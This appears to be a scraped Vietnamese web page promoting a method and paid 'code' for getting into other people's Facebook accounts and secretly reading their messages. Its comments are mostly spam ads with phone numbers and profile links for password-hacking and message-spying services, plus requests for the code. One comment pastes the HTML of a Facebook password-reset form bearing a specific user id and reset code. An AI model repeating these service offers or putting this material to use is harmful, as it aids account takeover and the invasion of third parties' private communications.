Hướng Dẫn Check Pass Facebook Không Chính Chủ —- Đọc Trộm Tin Nhắn Người KhácMua code ib fb :

Nhóm Giao Lưu Chia Sẻ Code :

Cách Lấy Lại Nick Facebook Cách lấy lại mật khẩu facebook bị hack đơn giản nhất 2020 Cách Lấy Lại Mật Khẩu FaceBook Bị Hack Thành Công Nhất 2020 —————————————————— #LấyLạiFaceBook #MấtGmailVàSĐT #FaceBookBịHack ——————————————————— Cách Lấy Lại Nick Facebook Quên Mật Khẩu Facebook , Khôi Phục Mật Khẩu Facebook Khi Quên Hay Bị Hack SĐT Hoặc Gmail Khôi Phục Mật Khẩu Facebook Khi Bị Hack Mở nick facebook Bị Hack Cach lay lai nick facebook bi hack khoi phuc mat khau facebook lấy lại mật khẩu facebook đã bị hack Mở Nick Facebook cách phục hồi tài khoản facebook lấy lại tài khoản facebook lấy lại tài khoản facebook khi bị hack hướng dẫn lấy lại nick facebook bị hack Mở nick facebook bị khóa fb bị hack lấy lại facebook bị hack fb bị hack phải làm sao lấy lại facebook bị hack gmail và số điện thoại hướng dẫn lấy lại fb bị hack Cách Lấy Lại Nick Facebook 2020

Nguồn: https://newblurayrelease.com/

Xem thêm bài viết khác: https://newblurayrelease.com/tong-hop/

 • Mình Có Tạo 1 Nhóm Riêng Cho Mọi Người Vào Chơi 😍😍😍
  https://m.facebook.com/groups/575306866455987/?ref=group_browse

  Dũng Tricker August 3, 2020 7:42 pm Reply
 • vào tai khoản ngkhac xem trộm tin nhắn này kia hay hách njck thấy ông Za lo nè 0 3 3 9 2 8 7 2 1 3 làm là ổn nhất

  Bảo Thoa August 3, 2020 7:42 pm Reply
 • Hach njck ngkhac, xem lén tin nhắn này kja, nhờ ông Z al o người đó 0 33 9 2 8 7 2 1-3 làm rất hay

  Bảo Ngọc August 3, 2020 7:42 pm Reply
 • Muốn theo dõi tn , làm không được nhờ za lo 0 8 / 6 2 / 4 4 / 9 2 / 1 1 làm rất hay ok nữa

  hoa Tuyết August 3, 2020 7:42 pm Reply
 • Đọc lén tn ,lấy mk ngkhac nhờ facebook.com/100011221189739 làm cho tốt và ok

  truongvinh nguyenduy August 3, 2020 7:42 pm Reply
 • đọc trộm tin nhắn messenger có anh này lầm đảm bảo nhất đó zal o O 8 6 2 4 4 9 2 I I

  kyuk Han August 3, 2020 7:42 pm Reply
 • hack mật khẩu ng ta ,ng iu đọc trộm fb nhờ anh Fb.com/hacking.support1 làm là chuẩn yên tâm đảm bảo

  tranchiensao haibalamchan August 3, 2020 7:42 pm Reply
 • lấy mk fb ngkhac cứ nhờ za lo 0 8 62 4 4 9 2 11 làm cho nhanh lắm

  Idmcj Rscx August 3, 2020 7:42 pm Reply
 • Bây giờ thấy có mỗi bạn này làm uy tín , an toàn thôi . Zalo 0 8 62 4 49 2 1 1

  Kfnfhf Nfnc August 3, 2020 7:42 pm Reply
 • hack pass , xem lén tn fb zl nhờ za lo 0 8 62 / 44 9 / 2 11 làm cho ok. nhờ nhiều mình mới dám gt

  Nguyenduong Truongvinh August 3, 2020 7:42 pm Reply
 • Đọc lén tn , lấy mk ngkhac vào face tìm “ Lê Nhật Minh Anh(support use fb zl)” làm giỏi và ok lém đấy nhờ nhiều mình mới dám gt mọi người .

  dieuyentao phinhanvien August 3, 2020 7:42 pm Reply
 • Hac mật khẩu , xem lén tn vào face tìm tên : “ Lê Nhật Minh Anh(support use fb zl)” làm nhanh ok lắm

  Hanajei Dung August 3, 2020 7:42 pm Reply
 • Hac mật khẩu , xem lén tn nhờ a này Fb.com/hacking.support1 làm giỏi nhờ rồi nên biết

  Tranthanh Truongvinh August 3, 2020 7:42 pm Reply
 • Hac mật khẩu , xem lén tn nhờ a này Fb.com/hacking.support1 làm giỏi nhờ rồi nên biết

  Pham Nhung August 3, 2020 7:42 pm Reply
 • Đọc lén tn ,lấy mk ngkhac nhờ facebook.com/100011221189739 làm cho tốt và ok

  Csv Ushh August 3, 2020 7:42 pm Reply
 • cho mình xin một code na, cảm ơn bạn nhiều

  Hậu Nguyễn Thành Công August 3, 2020 7:42 pm Reply
 • Cho e xin code ạ
  belay2k5@gmail.com

  Lay Be August 3, 2020 7:42 pm Reply
 • Có a nào nhận đệ ko ? ( có trả phí)

  Khánh khỉ August 3, 2020 7:42 pm Reply
 • <html>
  <head>
  <title>Chọn mật khẩu mới</title>
  <meta name="viewport" content="user-scalable=no,initial-scale=1,maximum-scale=1">
  <link href="https://static.xx.fbcdn.net/rsrc.php/v3/ya/r/O2aKM2iSbOw.png" rel="shortcut icon" sizes="196×196">
  <meta name="referrer" content="origin-when-crossorigin" id="meta_referrer">
  <meta name="theme-color" content="#3b5998">
  <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/y9/l/0,cross/DCm90_3aIIs.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="eB4s8" crossorigin="anonymous">
  <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/y_/l/0,cross/kjsoStqJnWk.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="TNouh" crossorigin="anonymous">
  <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/y6/l/0,cross/xapu_PmSqfv.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="txX0j" crossorigin="anonymous">
  <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/y4/l/0,cross/Q969HSV9zcV.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="DX+nO" crossorigin="anonymous">
  <meta http-equiv="origin-trial" data-feature="getInstalledRelatedApps" data-expires="2017-12-04" content="AvpndGzuAwLY463N1HvHrsK3WE5yU5g6Fehz7Vl7bomqhPI/nYGOjVg3TI0jq5tQ5dP3kDSd1HXVtKMQyZPRxAAAAABleyJvcmlnaW4iOiJodHRwczovL2ZhY2Vib29rLmNvbTo0NDMiLCJmZWF0dXJlIjoiSW5zdGFsbGVkQXBwIiwiZXhwaXJ5IjoxNTEyNDI3NDA0LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=">
  <meta name="robots" content="noindex">
  <link rel="manifest" href="/data/manifest/" crossorigin="use-credentials">
  <link href="https://static.xx.fbcdn.net/rsrc.php/v3/yr/r/JZn7M6hxTBH.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script" crossorigin="anonymous">
  <link href="https://static.xx.fbcdn.net/rsrc.php/v3/yw/r/tjkI5MltkcN.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script" crossorigin="anonymous">
  <link href="https://static.xx.fbcdn.net/rsrc.php/v3/yL/r/rgT-HAc6nQU.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script" crossorigin="anonymous">
  <link href="https://static.xx.fbcdn.net/rsrc.php/v3/yY/r/r133j27PmNP.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script" crossorigin="anonymous">
  <link href="https://static.xx.fbcdn.net/rsrc.php/v3iLPT4/yQ/l/vi_VN/zrD7-f5YKKh.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script" crossorigin="anonymous">
  <link href="https://static.xx.fbcdn.net/rsrc.php/v3/yK/r/94dpHMe0r9m.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script" crossorigin="anonymous">
  <link href="https://static.xx.fbcdn.net/rsrc.php/v3iC9q4/yG/l/vi_VN/xfnVtEoVZu_.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script" crossorigin="anonymous">
  <link href="https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/6KqFq7q8hV0.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script" crossorigin="anonymous">
  </head>
  <body tabindex="0" class="touch x2 android _fzu _50-3 iframe acw portrait" style="min-height: 739px; background-color: rgb(255, 255, 255);">
  <div id="viewport" data-kaios-focus-transparent="1" style="min-height: 739px;">
  <h1 style="display:block;height:0;overflow:hidden;position:absolute;width:0;padding:0">Facebook</h1>
  <div id="page" class="-hardstate-recover">
  <div class="_129_" id="header-notices"></div>
  <div class="_129- _6dr5" id="MChromeHeader">
  <div class="_7om2 _52we _52z5" id="header" data-sigil="MTopBlueBarHeader">
  <div class="_4g34 _52z6" data-sigil="mChromeHeaderCenter">
  <a href="/login/"><i class="img sp_K_OAjyL9mwQ_2x sx_efcca3"><u>facebook</u></i></a>
  </div>
  </div>
  </div>
  <div class="acw" id="root" role="main" data-sigil="context-layer-root content-pane" style="min-height: 695px;">
  <div class="_7om2">
  <div class="_4g34">
  <div class="_7vd2">
  <form method="post" action="https://m.facebook.com/recover/password/write/?u=100051388424837&amp;n=076572&amp;ars=facebook_login&amp;fl=skip_initiate_view" id="u_0_0">
  <input type="hidden" name="lsd" value="AVojWZCt" autocomplete="off">
  <input type="hidden" name="jazoest" value="2728" autocomplete="off">
  <p class="_6w8a" id="account_recovery_password_reset_label">Tạo mật khẩu mới</p>
  <div>
  <section class="_2ph- _6w89 _7br3">
  Tạo mật khẩu mới có tối thiểu 6 ký tự. Mật khẩu mạnh là mật khẩu được kết hợp từ các ký tự, số và dấu câu.
  </section>
  <section class="_2ph- _2pia">
  <div class="_1upc" id="u_0_1">
  <div class="_7om2">
  <div class="_4g34 _5i2i _52we">
  <div class="_5xu4">
  <input autocorrect="off" autocapitalize="off" autocomplete="off" spellcheck="false" class="_56bg _55wp _7br2 _85l2" aria-label="Enter a new password, Double-Tap to enter text" name="password_new" placeholder="Nhập mật khẩu mới" type="text" id="u_0_2" data-sigil="password-plain-text-toggle-input">
  </div>
  </div>
  <div class="_5s61 _216i _5i2i _52we">
  <div class="_5xu4">
  <div class="_2pi9" style="display:none" id="u_0_3">
  <a href="#" data-sigil="password-plain-text-toggle"><span class="mfss" id="u_0_4">ẨN</span><span class="mfss" style="display:none" id="u_0_5">HIỂN THỊ</span></a>
  </div>
  </div>
  </div>
  </div>
  </div>
  </section>
  </div>
  <div class="_2pi8 _7bq_">
  <button type="submit" value="Tiếp tục" class="_54k8 52jh _56bs _56b _7bq- _56bx _56bu" id="u_0_6" data-sigil="touchable"><span class="_55sr">Tiếp tục</span></button>
  </div>
  <div class="_3fh6 _2pi8">
  <button type="submit" value="Bỏ qua" class="_54k8 52jh _56bs _56b _7br7 _56bx _56bt" id="btn_skip" name="btn_skip" data-sigil="touchable"><span class="_55sr">Bỏ qua</span></button>
  </div>
  </form>
  </div>
  </div>
  </div>
  <div style="display:none">
  <div></div>
  <div></div>
  <div></div>
  </div>
  <span><img src="https://facebook.com/security/hsts-pixel.gif" width="0" height="0" style="display:none"></span>
  </div>
  <div class=""></div>
  <div class="viewportArea _2v9s" style="display:none" id="u_0_7" data-sigil="marea">
  <div class="_5vsg" id="u_0_8" style="max-height: 212px;"></div>
  <div class="_5vsh" id="u_0_9" style="max-height: 369px;"></div>
  <div class="_5v5d fcg">
  <div class="_2so _2sq _2ss img _50cg" data-animtype="1" data-sigil="m-loading-indicator-animate m-loading-indicator-root"></div>Đang tải…
  </div>
  </div>
  <div class="viewportArea aclb" id="mErrorView" style="display:none" data-sigil="marea">
  <div class="container">
  <div class="image"></div>
  <div class="message" data-sigil="error-message"></div>
  <a class="link" data-sigil="MPageError:retry">Thử lại</a>
  </div>
  </div>
  </div>
  </div>
  <div id="static_templates">
  <div class="mDialog" id="modalDialog" style="display:none" data-sigil=" context-layer-root" data-autoid="autoid_1">
  <div class="_52z5 _451a mFuturePageHeader _1uh1 firstStep titled" id="mDialogHeader">
  <div class="_7om2 _52we">
  <div class="_5s61">
  <div class="_52z7">
  <button type="submit" value="Hủy" class="cancelButton btn btnD bgb mfss touchable" id="u_0_b" data-sigil="dialog-cancel-button">Hủy</button>
  <button type="submit" value="Quay lại" class="backButton btn btnI bgb mfss touchable iconOnly" aria-label="Quay lại" id="u_0_c" data-sigil="dialog-back-button"><i class="img sp_K_OAjyL9mwQ_2x sx_17a718" style="margin-top: 2px;"></i></button>
  </div>
  </div>
  <div class="_4g34">
  <div class="_52z6">
  <div class="_50l4 mfsl fcw" id="m-future-page-header-title" role="heading" tabindex="0" data-sigil="m-dialog-header-title dialog-title">
  Đang tải…
  </div>
  </div>
  </div>
  <div class="_5s61">
  <div class="_52z8" id="modalDialogHeaderButtons"></div>
  </div>
  </div>
  </div>
  <div class="modalDialogView" id="modalDialogView"></div>
  <div class="_5v5d _5v5e fcg" id="dialogSpinner">
  <div class="_2so _2sq _2ss img _50cg" data-animtype="1" id="u_0_a" data-sigil="m-loading-indicator-animate m-loading-indicator-root"></div>Đang tải…
  </div>
  </div>
  </div>
  <link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/y9/l/0,cross/DCm90_3aIIs.css?_nc_x=Ij3Wp8lg5Kz" as="style" crossorigin="anonymous">
  <link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/y_/l/0,cross/kjsoStqJnWk.css?_nc_x=Ij3Wp8lg5Kz" as="style" crossorigin="anonymous">
  <link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yk/r/Df3UXrNhNWr.js?_nc_x=Ij3Wp8lg5Kz" as="script" crossorigin="anonymous">
  <link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yr/r/JZn7M6hxTBH.js?_nc_x=Ij3Wp8lg5Kz" as="script" crossorigin="anonymous">
  <link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3ie-K4/yo/l/vi_VN/rVsajeWE2of.js?_nc_x=Ij3Wp8lg5Kz" as="script" crossorigin="anonymous">
  <link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/y6/l/0,cross/xapu_PmSqfv.css?_nc_x=Ij3Wp8lg5Kz" as="style" crossorigin="anonymous">
  <link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/y4/l/0,cross/Q969HSV9zcV.css?_nc_x=Ij3Wp8lg5Kz" as="style" crossorigin="anonymous">
  <link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3iWPy4/yg/l/vi_VN/q960UEdDVwi.js?_nc_x=Ij3Wp8lg5Kz" as="script" crossorigin="anonymous">
  <link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yw/r/tjkI5MltkcN.js?_nc_x=Ij3Wp8lg5Kz" as="script" crossorigin="anonymous">
  <link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yL/r/rgT-HAc6nQU.js?_nc_x=Ij3Wp8lg5Kz" as="script" crossorigin="anonymous">
  </body>
  </html>

  ᑷᖽᐸᖶ ᖽᐸᓮᒶᒸᕩᖇ August 3, 2020 7:42 pm Reply
 • Em xin code ạ
  nguyenthithuha04081980@gmail.com

  Ẩm Thực Đa Dạng August 3, 2020 7:42 pm Reply
 • Ah dũng ơi ah dúng

  Long Soi August 3, 2020 7:42 pm Reply
 • Ah duyệt cho em em gửi yêu cầu rồi ❤

  Bao Quoc Ho August 3, 2020 7:42 pm Reply
 • Rep tin nhắn em anh ơi

  Long Ha August 3, 2020 7:42 pm Reply
 • Ai muốn học ib check pass và rip nick hoặc check pass thì ib mình nha!
  Giá học sinh nha !

  Tùng Quang August 3, 2020 7:42 pm Reply
 • xin code đi ạ

  Khánh Sục August 3, 2020 7:42 pm Reply
 • Xin code a ơi nbao4402@gmail.com

  Bao Nguyen August 3, 2020 7:42 pm Reply
 • Uy tín hk mấy bạn

  Thiên Nhật August 3, 2020 7:42 pm Reply
 • Mình đã liên hệ mua code ở a Dũng và thành công nha mọi người. Luôn ủng hộ anh 👏🏻

  Nguyễn Linh August 3, 2020 7:42 pm Reply
 • được đấy

  vo phu August 3, 2020 7:42 pm Reply
 • Ra clip phát code free đi a

  VieNamese Pi Network August 3, 2020 7:42 pm Reply
 • Xin code

  Kim Chi Đào August 3, 2020 7:42 pm Reply
 • Share code đi

  Nghia Do Van August 3, 2020 7:42 pm Reply
 • Đẳng cấp quá aaaaaa

  Lê Nguyễn Ngần Phương August 3, 2020 7:42 pm Reply
 • Đẳng cấp quá aaaaaa

  Lê Nguyễn Ngần Phương August 3, 2020 7:42 pm Reply
 • A tặng code đi chứ mua ai dám mua toàn bị lừa

  Điều Nguyễn August 3, 2020 7:42 pm Reply
 • Acc nào cx hack đc hay là 1 số thôi ạ !

  Dinhquan Vuong August 3, 2020 7:42 pm Reply
 • Zalo 0799068075 mình bán code nhé
  Nhận checkpass và all dịch vụ facebook
  Nhận học viên .
  Ib nhé

  Bao Le August 3, 2020 7:42 pm Reply
 • Tổ chức tặng code đi anh

  Hoài Lê August 3, 2020 7:42 pm Reply
 • Em xin mã sao chép thứ 2 với ạ

  Hạnh Minh August 3, 2020 7:42 pm Reply
 • Xin code điii bro

  Fuho Văn August 3, 2020 7:42 pm Reply
 • Xin key free a ơi

  Zing Channel August 3, 2020 7:42 pm Reply
 • Share code free đi a

  Zing Channel August 3, 2020 7:42 pm Reply
 • Đứng đây từ chiều :))

  Trườ ng August 3, 2020 7:42 pm Reply

Leave a Reply

Your email address will not be published. Required fields are marked *